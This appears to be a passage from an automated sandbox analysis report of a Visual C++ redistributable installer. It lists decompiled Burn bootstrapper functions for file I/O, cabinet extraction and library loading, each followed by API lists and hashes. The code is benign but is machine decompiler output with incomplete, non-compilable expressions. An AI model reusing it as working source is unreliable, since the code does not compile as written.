                                                                          • Instruction Fuzzy Hash: 0E21B735901619EFDB20DBA8C849EAFBBB8EF44752F154158FD05AB210CB35DE04CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00050658(void* __ecx, void* __edx, CHAR* _a4) {
                                                                          				long _v8;
                                                                          				int _t9;
                                                                          				void* _t16;
                                                                          				CHAR* _t18;
                                                                          				void* _t21;
                                                                          				void* _t22;
                                                                          				void* _t25;
                                                                          				void* _t28;
                                                                          
                                                                          				_t22 = __edx;
                                                                          				_push(__ecx);
                                                                          				_t18 = _a4;
                                                                          				_t28 = 0;
                                                                          				_t25 = 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				_t9 = lstrlenA(_t18);
                                                                          				_t21 =  *0x7a774; // 0xffffffff
                                                                          				_a4 = _t9;
                                                                          				if(_t21 != 0xffffffff) {
                                                                          					if(_t9 == 0) {
                                                                          						L9:
                                                                          						return _t28;
                                                                          					}
                                                                          					L4:
                                                                          					while(1) {
                                                                          						if(WriteFile(_t21, _t25 + _t18, _t9 - _t25,  &_v8, 0) != 0) {
                                                                          							L6:
                                                                          							_t25 = _t25 + _v8;
                                                                          							_t9 = _a4;
                                                                          							if(_t25 >= _t9) {
                                                                          								goto L9;
                                                                          							}
                                                                          							_t21 =  *0x7a774; // 0xffffffff
                                                                          							continue;
                                                                          						}
                                                                          						_t28 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          						if(_t28 < 0) {
                                                                          							E000137D3(_t14, "logutil.cpp", 0x310, _t28);
                                                                          							goto L9;
                                                                          						}
                                                                          						goto L6;
                                                                          					}
                                                                          				}
                                                                          				_t16 = E00012384(_t21, _t22, 0x7b608, _t18, 0); // executed
                                                                          				_t28 = _t16;
                                                                          				if(_t28 >= 0) {
                                                                          					_t28 = 0;
                                                                          				}
                                                                          				goto L9;
                                                                          			}












                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,0004FF0B,?,?,00000000,00000000,0000FDE9), ref: 0005066A
                                                                          • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,?,?,0004FF0B,?,?,00000000,00000000,0000FDE9), ref: 000506A6
                                                                          • GetLastError.KERNEL32(?,?,0004FF0B,?,?,00000000,00000000,0000FDE9), ref: 000506B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWritelstrlen
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 606256338-637279948
                                                                          • Opcode ID: 9bdad14addcf23d0b3a5052bd2f86cfb8e27a1ba68a21572b111eb3bc3ff2c66
                                                                          • Instruction ID: e0c0b755d6fd8242acd6600c1245ae0a9c2a0ecf08136d37cc1daf3944162bc9
                                                                          • Opcode Fuzzy Hash: 9bdad14addcf23d0b3a5052bd2f86cfb8e27a1ba68a21572b111eb3bc3ff2c66
                                                                          • Instruction Fuzzy Hash: 6A11E576A01324ABE3209A7ACC48EAFBAACEBC5762B004215FD05E7140E734AD10C6E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 63%
                                                                          			E0003074E(void* __ecx, void* __eflags, void* _a4, void* _a8, long _a12) {
                                                                          				long _v8;
                                                                          				int _t19;
                                                                          				signed short _t22;
                                                                          				signed int _t27;
                                                                          				intOrPtr _t31;
                                                                          				struct _OVERLAPPED* _t34;
                                                                          
                                                                          				_t27 =  *0x7aac0; // 0x0
                                                                          				_t34 = 0;
                                                                          				_v8 = 0;
                                                                          				_t31 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t27 * 4)) + 4));
                                                                          				E0003114F(__eflags, _t31 + 0x1c, _a4, _a12); // executed
                                                                          				_t19 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                                                          				if(_t19 == 0) {
                                                                          					_t22 = GetLastError();
                                                                          					_t38 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "cabextract.cpp", 0x2ec, _t34);
                                                                          					_push("Failed to read during cabinet extraction.");
                                                                          					E0005012F();
                                                                          					_t27 = _t34;
                                                                          				}
                                                                          				 *((intOrPtr*)(_t31 + 0x30)) = _t34;
                                                                          				_t21 =  <  ? _t27 | 0xffffffff : _v8;
                                                                          				return  <  ? _t27 | 0xffffffff : _v8;
                                                                          			}










                                                                          APIs
                                                                            • Part of subcall function 0003114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0003077D,?,?,?), ref: 00031177
                                                                            • Part of subcall function 0003114F: GetLastError.KERNEL32(?,0003077D,?,?,?), ref: 00031181
                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 0003078B
                                                                          • GetLastError.KERNEL32 ref: 00030795
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$PointerRead
                                                                          • String ID: @Met$Failed to read during cabinet extraction.$cabextract.cpp
                                                                          • API String ID: 2170121939-2568642345
                                                                          • Opcode ID: acd500e1b81429c3fc42734d112efdb1782f2e829c6d95d80f2de3c54f43d1ea
                                                                          • Instruction ID: 4f973767848a904378dd558d85cd88db781a88d310ad3eeed5139f0019b93fed
                                                                          • Opcode Fuzzy Hash: acd500e1b81429c3fc42734d112efdb1782f2e829c6d95d80f2de3c54f43d1ea
                                                                          • Instruction Fuzzy Hash: 9701A572A00625BBDB11AFA9DC05EDB7BADFF09760F010119FD08E7550D7359A108BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 31%
                                                                          			E0003114F(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                          				int _t11;
                                                                          				void* _t19;
                                                                          				long _t20;
                                                                          
                                                                          				_t20 = 0x80070490;
                                                                          				_t19 = E00031127(_a4, _a8);
                                                                          				if(_t19 != 0) {
                                                                          					_t20 = 0;
                                                                          					_push(0);
                                                                          					_t11 = SetFilePointerEx(_a8,  *(_t19 + 8),  *(_t19 + 0xc), 0); // executed
                                                                          					if(_t11 != 0) {
                                                                          						 *(_t19 + 8) =  *(_t19 + 8) + _a12;
                                                                          						asm("adc [edi+0xc], esi");
                                                                          					} else {
                                                                          						_t23 =  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
                                                                          						_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x37e, _t20);
                                                                          						_push("Failed to move to virtual file pointer.");
                                                                          						_push(_t20);
                                                                          						E0005012F();
                                                                          					}
                                                                          				}
                                                                          				return _t20;
                                                                          			}







                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0003077D,?,?,?), ref: 00031177
                                                                          • GetLastError.KERNEL32(?,0003077D,?,?,?), ref: 00031181
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move to virtual file pointer.$cabextract.cpp
                                                                          • API String ID: 2976181284-1626086099
                                                                          • Opcode ID: 43f5124eba228c8275e2028fee047b616fea9a7c753c7a3391a6d8426c8abbb4
                                                                          • Instruction ID: 47c6913ecf044b138a95f79102cba4b6a29df9ef8011d98b9f816efe4ec4922f
                                                                          • Opcode Fuzzy Hash: 43f5124eba228c8275e2028fee047b616fea9a7c753c7a3391a6d8426c8abbb4
                                                                          • Instruction Fuzzy Hash: A901D637640736BBD7221AA69C04ED7BFA9EF457B1B018125FE0C96550D735DC20CAE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 86%
                                                                          			E00053DB5(signed short __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, intOrPtr* _a20) {
                                                                          				signed int _v8;
                                                                          				void _v4104;
                                                                          				long _v4108;
                                                                          				intOrPtr _v4112;
                                                                          				long _v4116;
                                                                          				void* _v4120;
                                                                          				intOrPtr _v4124;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t32;
                                                                          				long _t37;
                                                                          				int _t39;
                                                                          				signed short _t40;
                                                                          				long _t45;
                                                                          				void* _t47;
                                                                          				intOrPtr* _t49;
                                                                          				void* _t50;
                                                                          				intOrPtr _t55;
                                                                          				signed short _t56;
                                                                          				intOrPtr _t58;
                                                                          				void* _t59;
                                                                          				signed short _t64;
                                                                          				void* _t65;
                                                                          				signed int _t66;
                                                                          				void* _t73;
                                                                          
                                                                          				_t56 = __edx;
                                                                          				E00059F00();
                                                                          				_t32 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t32 ^ _t66;
                                                                          				asm("xorps xmm0, xmm0");
                                                                          				_t49 = _a20;
                                                                          				asm("movlpd [ebp-0x100c], xmm0");
                                                                          				_v4120 = _a4;
                                                                          				_t58 = _v4112;
                                                                          				_v4124 = _a8;
                                                                          				_v4116 = _v4108;
                                                                          				do {
                                                                          					if(_a12 != 0 || _a16 != 0) {
                                                                          						_t56 = _a16;
                                                                          						_t37 = _a12 - _t58;
                                                                          						asm("sbb edx, ecx");
                                                                          						__eflags = _t56;
                                                                          						if(__eflags < 0) {
                                                                          							L8:
                                                                          							_v4108 = _t56;
                                                                          							goto L9;
                                                                          						}
                                                                          						if(__eflags > 0) {
                                                                          							L7:
                                                                          							_v4108 = _v4108 & 0x00000000;
                                                                          							_t37 = 0x1000;
                                                                          							goto L9;
                                                                          						}
                                                                          						__eflags = _t37 - 0x1000;
                                                                          						if(_t37 <= 0x1000) {
                                                                          							goto L8;
                                                                          						}
                                                                          						goto L7;
                                                                          					} else {
                                                                          						_t37 = 0x1000;
                                                                          						L9:
                                                                          						_v4108 = _t37;
                                                                          						_t39 = ReadFile(_v4120,  &_v4104, _t37,  &_v4108, 0); // executed
                                                                          						if(_t39 == 0) {
                                                                          							_t40 = GetLastError();
                                                                          							__eflags = _t40;
                                                                          							_t64 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t64;
                                                                          							_t61 =  >=  ? 0x80004005 : _t64;
                                                                          							E000137D3(0x80004005, "fileutil.cpp", 0x407,  >=  ? 0x80004005 : _t64);
                                                                          							L20:
                                                                          							_pop(_t59);
                                                                          							_pop(_t65);
                                                                          							_pop(_t50);
                                                                          							return E0003DE36(_t50, _v8 ^ _t66, _t56, _t59, _t65);
                                                                          						}
                                                                          						_t45 = _v4108;
                                                                          						if(_t45 == 0) {
                                                                          							goto L13;
                                                                          						}
                                                                          						_t47 = E00054CEE( &_v4108, _v4124,  &_v4104, _t45); // executed
                                                                          						if(_t47 < 0) {
                                                                          							goto L20;
                                                                          						}
                                                                          						_t45 = _v4108;
                                                                          					}
                                                                          					L13:
                                                                          					_t55 = _v4116;
                                                                          					_t58 = _t58 + _t45;
                                                                          					asm("adc ecx, 0x0");
                                                                          					_v4116 = _t55;
                                                                          					_t73 = _t55 - _a16;
                                                                          				} while (_t73 <= 0 && (_t73 < 0 || _t58 < _a12) && _t45 != 0);
                                                                          				if(_t49 != 0) {
                                                                          					 *_t49 = _t58;
                                                                          					 *((intOrPtr*)(_t49 + 4)) = _t55;
                                                                          				}
                                                                          				goto L20;
                                                                          			}































                                                                          APIs
                                                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00053E5E
                                                                          • GetLastError.KERNEL32 ref: 00053EC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1948546556-2299628883
                                                                          • Opcode ID: 6e81877a6014982ea4467870ad46050b5caf5b2b3565cad8ef201f402c4db3ac
                                                                          • Instruction ID: 8070cb080e5c3433e41d14eb7924cfcd84b08f4039685fb4dd7d17a966ed3b01
                                                                          • Opcode Fuzzy Hash: 6e81877a6014982ea4467870ad46050b5caf5b2b3565cad8ef201f402c4db3ac
                                                                          • Instruction Fuzzy Hash: B0414F71E002699BDB61CE54CC417EBB7E8EF48792F0041A6AD49E7280D7B49EC89B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000137EA(void* __edx, intOrPtr _a4, struct HINSTANCE__** _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t15;
                                                                          				signed int _t20;
                                                                          				void* _t22;
                                                                          				struct HINSTANCE__* _t26;
                                                                          				signed short _t27;
                                                                          				void* _t31;
                                                                          				struct HINSTANCE__** _t32;
                                                                          				void* _t33;
                                                                          				void* _t36;
                                                                          				intOrPtr _t37;
                                                                          				signed int _t42;
                                                                          
                                                                          				_t36 = __edx;
                                                                          				_t15 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t15 ^ _t42;
                                                                          				_t32 = _a8;
                                                                          				_t37 = _a12;
                                                                          				E0003F670(_t37,  &_v528, 0, 0x208);
                                                                          				_t38 = 0x104;
                                                                          				_t20 = GetSystemDirectoryW( &_v528, 0x104);
                                                                          				if(_t20 != 0) {
                                                                          					_t33 = 0x5c;
                                                                          					if(_t33 ==  *((intOrPtr*)(_t42 + _t20 * 2 - 0x20e))) {
                                                                          						L6:
                                                                          						_t22 = E000136B4(_t33,  &_v528, _t38, _a4);
                                                                          						_t39 = _t22;
                                                                          						if(_t22 < 0) {
                                                                          							L10:
                                                                          							return E0003DE36(_t32, _v8 ^ _t42, _t36, _t37, _t39);
                                                                          						}
                                                                          						_t26 = LoadLibraryW( &_v528); // executed
                                                                          						 *_t32 = _t26;
                                                                          						if(_t26 == 0) {
                                                                          							goto L1;
                                                                          						}
                                                                          						if(_t37 != 0) {
                                                                          							_t39 = E000121A5(_t37,  &_v528, 0x104);
                                                                          						}
                                                                          						goto L10;
                                                                          					}
                                                                          					_t31 = E00013665(_t33,  &_v528, 0x104, "\\", 1);
                                                                          					_t39 = _t31;
                                                                          					if(_t31 < 0) {
                                                                          						goto L10;
                                                                          					} else {
                                                                          						_t38 = 0x104;
                                                                          						goto L6;
                                                                          					}
                                                                          				}
                                                                          				L1:
                                                                          				_t27 = GetLastError();
                                                                          				_t39 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          				if(( <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000) >= 0) {
                                                                          					_t39 = 0x80004005;
                                                                          				}
                                                                          				goto L10;
                                                                          			}





















                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00013829
                                                                          • GetLastError.KERNEL32 ref: 00013833
                                                                          • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 0001389B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                          • String ID: @Met
                                                                          • API String ID: 1230559179-2381362037
                                                                          • Opcode ID: 71bdbe5869f60907d9075dc331a1d389f6de140408b67a77dbcd58cc370a04f7
                                                                          • Instruction ID: 9ead2b5a782eeb8e2a227e7ccea4e9b718541e8eacf7dfd5570740712976cce7
                                                                          • Opcode Fuzzy Hash: 71bdbe5869f60907d9075dc331a1d389f6de140408b67a77dbcd58cc370a04f7
                                                                          • Instruction Fuzzy Hash: 1A21AAB6D0132967EB20DB649C45FDBB7ACAB44710F114165BD04E7241EA35EE8887E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00054CEE(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				long _v8;
                                                                          				int _t14;
                                                                          				intOrPtr _t19;
                                                                          				void* _t23;
                                                                          				void* _t26;
                                                                          
                                                                          				_t19 = _a8;
                                                                          				_t26 = 0;
                                                                          				_v8 = _v8 & 0;
                                                                          				_t23 = 0;
                                                                          				do {
                                                                          					_t14 = WriteFile(_a4, _t23 + _t19, _a12 - _t23,  &_v8, 0); // executed
                                                                          					if(_t14 != 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						_t26 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
                                                                          						if(_t26 < 0) {
                                                                          							E000137D3(_t16, "fileutil.cpp", 0x3e7, _t26);
                                                                          						} else {
                                                                          							goto L3;
                                                                          						}
                                                                          					}
                                                                          					L6:
                                                                          					return _t26;
                                                                          					L3:
                                                                          					_t23 = _t23 + _v8;
                                                                          				} while (_t23 < _a12);
                                                                          				goto L6;
                                                                          			}









                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00053E85,?,?,?), ref: 00054D12
                                                                          • GetLastError.KERNEL32(?,?,00053E85,?,?,?), ref: 00054D1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 442123175-2299628883
                                                                          • Opcode ID: 4afc3e2669dd70881824d35d458dc8e8a47aee1234f9591f1ebfefb147bcc63c
                                                                          • Instruction ID: 3f9420624fdef6cbe813b6cfe6f8ebf8c8ded8f2c09e1c2ad0e3f362424fbacf
                                                                          • Opcode Fuzzy Hash: 4afc3e2669dd70881824d35d458dc8e8a47aee1234f9591f1ebfefb147bcc63c
                                                                          • Instruction Fuzzy Hash: 00F08172A01229BBD7109E9ACC48EEFBBADFB44762F004116FD05D7040D631AD4086F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E000547D3(void* __ecx, void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                          				intOrPtr _v8;
                                                                          				void* _v12;
                                                                          				int _t11;
                                                                          				intOrPtr* _t12;
                                                                          				void* _t21;
                                                                          
                                                                          				_push(_a20);
                                                                          				_t21 = 0;
                                                                          				_t11 = SetFilePointerEx(_a4, _a8, _a12,  &_v12); // executed
                                                                          				if(_t11 != 0) {
                                                                          					_t12 = _a16;
                                                                          					if(_t12 != 0) {
                                                                          						 *_t12 = _v12;
                                                                          						 *((intOrPtr*)(_t12 + 4)) = _v8;
                                                                          					}
                                                                          				} else {
                                                                          					_t25 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "fileutil.cpp", 0x20a, _t21);
                                                                          				}
                                                                          				return _t21;
                                                                          			}









                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547EB
                                                                          • GetLastError.KERNEL32(?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 2976181284-2299628883
                                                                          • Opcode ID: 2c0ec5e4397eeca90825c4181eb26b08dc4932a8c2f39bba11afe1b3c50b6a91
                                                                          • Instruction ID: 12172e95711e90b86334c86fb25769670100953715e01051bdfb1eda99bf516d
                                                                          • Opcode Fuzzy Hash: 2c0ec5e4397eeca90825c4181eb26b08dc4932a8c2f39bba11afe1b3c50b6a91
                                                                          • Instruction Fuzzy Hash: EAF08171A00319AFEB208F95CC08DAB7BE8EF04755B014119FD09D7250D631DC50DBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00013999(void* _a4) {
                                                                          				char _t3;
                                                                          				long _t6;
                                                                          
                                                                          				_t6 = 0;
                                                                          				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                          				if(_t3 == 0) {
                                                                          					_t6 =  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
                                                                          				}
                                                                          				return _t6;
                                                                          			}






                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00013B34,00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7), ref: 000139A3
                                                                          • RtlFreeHeap.NTDLL(00000000,?,00013B34,00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7,000001C7,00000100), ref: 000139AA
                                                                          • GetLastError.KERNEL32(?,00013B34,00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7,000001C7,00000100,?), ref: 000139B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ErrorFreeLastProcess
                                                                          • String ID: @Met
                                                                          • API String ID: 406640338-2381362037
                                                                          • Opcode ID: 6b48bfd4fc31ea28ae8534e1e3af41ba0c7f9cdcaa2d6f303c03ea4218dd2fcb
                                                                          • Instruction ID: 6c442720b8eea27465eda6b558bf25ff948ebe8db821d17b40cc00dc889000ff
                                                                          • Opcode Fuzzy Hash: 6b48bfd4fc31ea28ae8534e1e3af41ba0c7f9cdcaa2d6f303c03ea4218dd2fcb
                                                                          • Instruction Fuzzy Hash: 76D012326007346797602BFA5C0C697BE9CEF456A27414021FD05D6110D729981086E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E0001501B(signed short* _a4) {
                                                                          				signed int _t8;
                                                                          				int _t9;
                                                                          				int _t12;
                                                                          				signed int _t13;
                                                                          				short* _t15;
                                                                          				signed int _t16;
                                                                          				signed short* _t17;
                                                                          				int _t19;
                                                                          
                                                                          				_t8 =  *0x7aa50; // 0x1
                                                                          				_t15 = L"burn.clean.room";
                                                                          				_t19 = 1;
                                                                          				if((_t8 & 0x00000001) != 0) {
                                                                          					_t9 =  *0x7aa4c; // 0xf
                                                                          				} else {
                                                                          					 *0x7aa50 = _t8 | 1;
                                                                          					_t9 = lstrlenW(_t15);
                                                                          					 *0x7aa4c = _t9;
                                                                          				}
                                                                          				_t17 = _a4;
                                                                          				if(_t17 == 0) {
                                                                          					L8:
                                                                          					_t19 = 0;
                                                                          				} else {
                                                                          					_t16 =  *_t17 & 0x0000ffff;
                                                                          					if(_t16 == 0x2d || _t16 == 0x2f) {
                                                                          						_t12 = CompareStringW(0x7f, _t19,  &(_t17[1]), _t9, _t15, _t9); // executed
                                                                          						if(_t12 != 2) {
                                                                          							goto L8;
                                                                          						} else {
                                                                          							_t13 =  *0x7aa4c; // 0xf
                                                                          							if( *((short*)(_t17 + 2 + _t13 * 2)) != 0x3d) {
                                                                          								goto L8;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						goto L8;
                                                                          					}
                                                                          				}
                                                                          				return _t19;
                                                                          			}












                                                                          APIs
                                                                          • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00011104,?,?,00000000), ref: 0001503A
                                                                          • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00011104,?,?,00000000), ref: 0001506A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareStringlstrlen
                                                                          • String ID: burn.clean.room
                                                                          • API String ID: 1433953587-3055529264
                                                                          • Opcode ID: 733efcb49af034f6bf26c0d85967be9bd46235f59b9e67c8bbce16cd402678c1
